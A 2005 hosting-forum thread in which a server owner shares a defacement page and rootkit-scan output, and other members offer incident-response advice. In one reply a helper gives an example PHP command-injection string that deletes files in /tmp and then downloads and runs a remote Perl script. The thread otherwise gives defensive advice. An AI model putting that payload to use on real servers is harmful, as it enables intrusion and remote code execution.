Results 1 to 17 of 17
Thread: server hacked ... advise needed
-
10-31-2005, 04:13 PM #1Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
server hacked ... advise needed
my server hosting company sent me email telling me my website may have been defaced. and i should investigate my server for possible compromise as soon as possible. The defaced website is:
www.AAAAAAAA.com/scgi-bin
i fount afile named indrx.php and the content of it is:
Code:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Hacked By CyBeRLORD</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9"> <style type="text/css"> <!-- body,td,th { color: #FFFFFF; } body { background-color: #000000; } .style1 {font-size: 36px} a:link { color: #FFFFFF; } a:visited { color: #000000; } --> </style></head> <body> <table width="984" border="0"> <tr> <td height="98"> </td> <td align="center"><img src="http://lejyoner21.sitemynet.com/11.jpg" width="323" height="349"> </td> <td> </td> </tr> <tr> <td height="114"> </td> <td align="center"><span class="style1">Hacked By CyBeRLORD Owns Your System </span></td> <td align="center"><span class="style1">cyberlord@hiperturk.com </span></td> <td> </td> </tr> <tr> <td height="216"> </td> <td align="center"><span class="style1"><a href="http://biyo.5gigs.com">www.cyber-soldiers.org and www.biyo.tk</a></span></td> <td> </td> </tr> </table> </body> </html>
Code:Checking binaries * Selftests Strings (command) [ OK ] * System tools Performing 'known good' check... /bin/cat [ OK ] /bin/chmod [ OK ] /bin/chown [ OK ] /bin/dmesg [ BAD ] /bin/egrep [ OK ] /bin/env [ OK ] /bin/fgrep [ OK ] /bin/grep [ OK ] /bin/kill [ BAD ] /bin/login [ BAD ] /bin/ls [ OK ] /bin/mount [ BAD ] /bin/netstat [ OK ] /bin/ps [ OK ] /bin/su [ OK ] /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ OK ] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/modinfo [ OK ] /sbin/runlevel [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ OK ] /usr/bin/groups [ OK ] /usr/bin/kill [ OK ] /usr/bin/killall [ OK ] /usr/bin/lsattr [ OK ] /usr/bin/pstree [ OK ] /usr/bin/sha1sum [ OK ] /usr/bin/stat [ OK ] /usr/bin/users [ OK ] /usr/bin/w [ OK ] /usr/bin/watch [ OK ] /usr/bin/who [ OK ] /usr/bin/whoami [ OK ] -------------------------------------------------------------------------------- Rootkit Hunter found some bad or unknown hashes. This can be happen due replaced binaries or updated packages (which give other hashes). Be sure your hashes are fully updated (rkhunter --update). If you're in doubt about these hashes, contact the author (fill in the contact form). Check rootkits * Default files and directories Rootkit '55808 Trojan - Variant A'... [ OK ] ADM Worm... [ OK ] Rootkit 'AjaKit'... [ OK ] Rootkit 'aPa Kit'... [ OK ] Rootkit 'Apache Worm'... [ OK ] Rootkit 'Ambient (ark) Rootkit'... [ OK ] Rootkit 'Balaur Rootkit'... [ OK ] Rootkit 'BeastKit'... [ OK ] Rootkit 'beX2'... [ OK ] Rootkit 'BOBKit'... [ OK ] Rootkit 'CiNIK Worm (Slapper.B variant)'... [ OK ] Rootkit 'Danny-Boy's Abuse Kit'... [ OK ] Rootkit 'Devil RootKit'... [ OK ] Rootkit 'Dica'... [ OK ] Rootkit 'Dreams Rootkit'... [ OK ] Rootkit 'Duarawkz'... [ OK ] Rootkit 'Flea Linux Rootkit'... [ OK ] Rootkit 'FreeBSD Rootkit'... [ OK ] Rootkit '****`it Rootkit'... [ OK ] Rootkit 'GasKit'... [ OK ] Rootkit 'Heroin LKM'... [ OK ] Rootkit 'HjC Kit'... [ OK ] Rootkit 'ignoKit'... [ OK ] Rootkit 'ImperalsS-FBRK'... [ OK ] Rootkit 'Irix Rootkit'... [ OK ] Rootkit 'Kitko'... [ OK ] Rootkit 'Knark'... [ OK ] Rootkit 'Li0n Worm'... [ OK ] Rootkit 'Lockit / LJK2'... [ OK ] Rootkit 'MRK'... [ OK ] Rootkit 'Ni0 Rootkit'... [ OK ] Rootkit 'RootKit for SunOS / NSDAP'... [ OK ] Rootkit 'Optic Kit (Tux)'... [ OK ] Rootkit 'Oz Rootkit'... [ OK ] Rootkit 'Portacelo'... [ OK ] Rootkit 'R3dstorm Toolkit'... [ OK ] Rootkit 'RH-Sharpe's rootkit'... [ OK ] Rootkit 'RSHA's rootkit'... [ OK ] Sebek LKM [ OK ] Rootkit 'Scalper Worm'... [ OK ] Rootkit 'Shutdown'... [ OK ] Rootkit 'SHV4'... [ OK ] Rootkit 'SHV5'... [ OK ] Rootkit 'Sin Rootkit'... [ OK ] Rootkit 'Slapper'... [ OK ] Rootkit 'Sneakin Rootkit'... [ OK ] Rootkit 'Suckit Rootkit'... [ OK ] Rootkit 'SunOS Rootkit'... [ OK ] Rootkit 'Superkit'... [ OK ] Rootkit 'TBD (Telnet BackDoor)'... [ OK ] Rootkit 'TeLeKiT'... [ OK ] Rootkit 'T0rn Rootkit'... [ OK ] Rootkit 'Trojanit Kit'... [ OK ] Rootkit 'Tuxtendo'... [ OK ] Rootkit 'URK'... [ OK ] Rootkit 'VcKit'... [ OK ] Rootkit 'Volc Rootkit'... [ OK ] Rootkit 'X-Org SunOS Rootkit'... [ OK ] Rootkit 'zaRwT.KiT Rootkit'... [ OK ] * Suspicious files and malware Scanning for known rootkit strings [ OK ] Scanning for known rootkit files [ OK ] Testing running processes... [ OK ] Miscellaneous Login backdoors [ OK ] Miscellaneous directories [ OK ] Software related files [ OK ] Sniffer logs [ OK ] * Trojan specific characteristics shv4 Checking /etc/rc.d/rc.sysinit Test 1 [ Clean ] Test 2 [ Clean ] Test 3 [ Clean ] Checking /etc/inetd.conf [ Clean ] Checking /etc/xinetd.conf [ Clean ] * Suspicious file properties chmod properties Checking /bin/ps [ Clean ] Checking /bin/ls [ Clean ] Checking /usr/bin/w [ Clean ] Checking /usr/bin/who [ Clean ] Checking /bin/netstat [ Clean ] Checking /bin/login [ Clean ] Script replacements Checking /bin/ps [ Clean ] Checking /bin/ls [ Clean ] Checking /usr/bin/w [ Clean ] Checking /usr/bin/who [ Clean ] Checking /bin/netstat [ Clean ] Checking /bin/login [ Clean ] * OS dependant tests Linux Checking loaded kernel modules... [ OK ] Checking files attributes [ OK ] Checking LKM module path [ OK ] Networking * Check: frequently used backdoors warning, got bogus tcp line. Port 2001: Scalper Rootkit [ OK ] Port 2006: CB Rootkit [ OK ] Port 2128: MRK [ OK ] Port 14856: Optic Kit (Tux) [ OK ] Port 47107: T0rn Rootkit [ OK ] Port 60922: zaRwT.KiT [ OK ] * Interfaces Scanning for promiscuous interfaces [ OK ] System checks * Allround tests Checking hostname... Found. Hostname is host.indexsignal.com Checking for passwordless user accounts... OK Checking for differences in user accounts... OK. No changes. Checking for differences in user groups... OK. No changes. Checking boot.local/rc.local file... - /etc/rc.local [ OK ] - /etc/rc.d/rc.local [ OK ] - /usr/local/etc/rc.local [ Not found ] - /usr/local/etc/rc.d/rc.local [ Not found ] - /etc/conf.d/local.start [ Not found ] - /etc/init.d/boot.local [ Not found ] Checking rc.d files... Processing........................................ ........................................ ........................................ ..................................... ........................................ ........................................ ........................................ ........................................ ........................................ ........................................ .............. Result rc.d files check [ OK ] Checking history files Bourne Shell [ OK ] * Filesystem checks Checking /dev for suspicious files... [ OK ] Scanning for hidden files... Application advisories * Application scan Checking Apache2 modules ... [ Not found ] Checking Apache configuration ... [ OK ] * Application version scan - Exim MTA 4.52 [ OK ] - GnuPG 1.2.1 [ Old or patched version ] - Apache [unknown] [ OK ] - Bind DNS 9.2.4 [ OK ] - OpenSSL 0.9.7a [ Old or patched version ] - PHP 4.3.11 [ OK ] - PHP 4.3.11 [ OK ] - Procmail MTA 3.22 [ OK ] - OpenSSH 3.6.1p2 [ Old or patched version ] Security advisories * Check: Groups and Accounts Searching for /etc/passwd... [ Found ] Checking users with UID '0' (root)... [ OK ] * Check: SSH Searching for sshd_config... Found /etc/ssh/sshd_config Checking for allowed root login... Watch out Root login possible. Possible risk! info: Hint: See logfile for more information about this issue Checking for allowed protocols... [ OK (Only SSH2 allowed) ] * Check: Events and Logging Search for syslog configuration... [ OK ] Checking for running syslog slave... [ OK ] Checking for logging to remote system... [ OK (no remote logging) ] ---------------------------- Scan results ---------------------------- MD5 MD5 compared: 115 Incorrect MD5 checksums: 4 File scan Scanned files: 342 Possible infected files: 0 Application scan Vulnerable applications: 3 Scanning took 672 seconds
i did all my best to secure my server following all advices mentioned in WebHostingTalk forum for the past 2 years and i was updating every thing in my box to secure it
there only my personal website on this server so am the only user
how did that hacker got into my server?
the only thing i remeber that might cuz this is installing php mailing list 2 weeks ago
and do i need to reformat my server? i hope not
-
10-31-2005, 04:31 PM #2Web Hosting Master
- Join Date
- Mar 2002
- Location
- St. Louis, MO
- Posts
- 1,379
While it doesnt neccessary appear your system has been rooted, more then likely what was used was some form of php injection or some other exploit in a script like something like this as an example
somescript.php?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://somesite.com/.it/in;perl%20in;
Wouldnt hurt to perform other audits on your system anyway. Look thru your logs, once you figure out how it was done you can install or disable somethign to futher prevent it, like mod_security
-
10-31-2005, 04:43 PM #3Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
i did ( last | more ) to check if someone else was ssh my server but i found nothing...my IP adress was the only thing loging my server on october
-
10-31-2005, 05:03 PM #4Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
i sent my box hosting company email asking then if OS reload needed and the reply was :
(( An OS reload is not necessary in this case, it would seem you have done enough to help secure the server. The php email list script was the most likely cause of this if you have not had problems recently ))
i will take a look in that php email list script code and see if i find somthing in it
-
10-31-2005, 05:11 PM #5Web Hosting Master
- Join Date
- Mar 2002
- Location
- St. Louis, MO
- Posts
- 1,379
Run this see if you get anything
for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
-
10-31-2005, 05:23 PM #6WHT Addict
- Join Date
- Nov 2003
- Location
- Oklahoma
- Posts
- 146
Just wondering if you were running CPanel? Either way I would recommend you use cpanel script to secure your tmp folder or find the procedure to do this.
-
10-31-2005, 05:50 PM #7Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
From what you posted your server does not look rooted. One very important thing to keep update is the kernel. If you keep your kernel updated you are going to have a lot less of a chance of getting rooted by these anoying php injection attacks.
If possible limit your available php functions and it will help with these sorts of attacks.John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-31-2005, 05:54 PM #8Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
Originally Posted by DigiCrime
do u mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?
or grep "wget" $files; done;[ filename ]
cuz am getting syntax errors
-
10-31-2005, 05:56 PM #9Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
Originally Posted by xmlxp
egrep wget /usr/local/apache/domlogs/*
but keep in mind there are more ways then just wget to put a sript on your serverJohn W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-31-2005, 05:58 PM #10Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
Originally Posted by rhenderson
WHM 10.6.0 cPanel 10.8.0-S59
RedHat Enterprise 3 i686 - WHM X v3.1.0
and did all necessary security teak needs for Cpanel
-
10-31-2005, 06:11 PM #11Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
Originally Posted by eth00
php open_basedir Protection is enabled
php safe mode on
and did every thing in here
http://www.hostinglife.com/security.php
where i can read about these anoying php injection attacks ?
-
10-31-2005, 06:11 PM #12WHT Addict
- Join Date
- Nov 2003
- Location
- Oklahoma
- Posts
- 146
Originally Posted by xmlxp
Good Luck
-
10-31-2005, 06:14 PM #13Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
Originally Posted by eth00
root@host [~]# egrep wget /usr/local/apache/domlogs/*
root@host [~]#
-
10-31-2005, 06:21 PM #14Web Hosting Master
- Join Date
- Mar 2002
- Location
- St. Louis, MO
- Posts
- 1,379
Originally Posted by xmlxp
-
10-31-2005, 06:25 PM #15Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
Originally Posted by DigiCrime
-bash: syntax error near unexpected token `do'
-
10-31-2005, 06:54 PM #16Web Hosting Master
- Join Date
- Mar 2002
- Location
- St. Louis, MO
- Posts
- 1,379
Code:for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
-
10-31-2005, 07:02 PM #17Web Hosting Guru
- Join Date
- Jun 2004
- Posts
- 308
Originally Posted by DigiCrime
Code:root@host [~]#for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
Last edited by XMLxp; 10-31-2005 at 07:12 PM.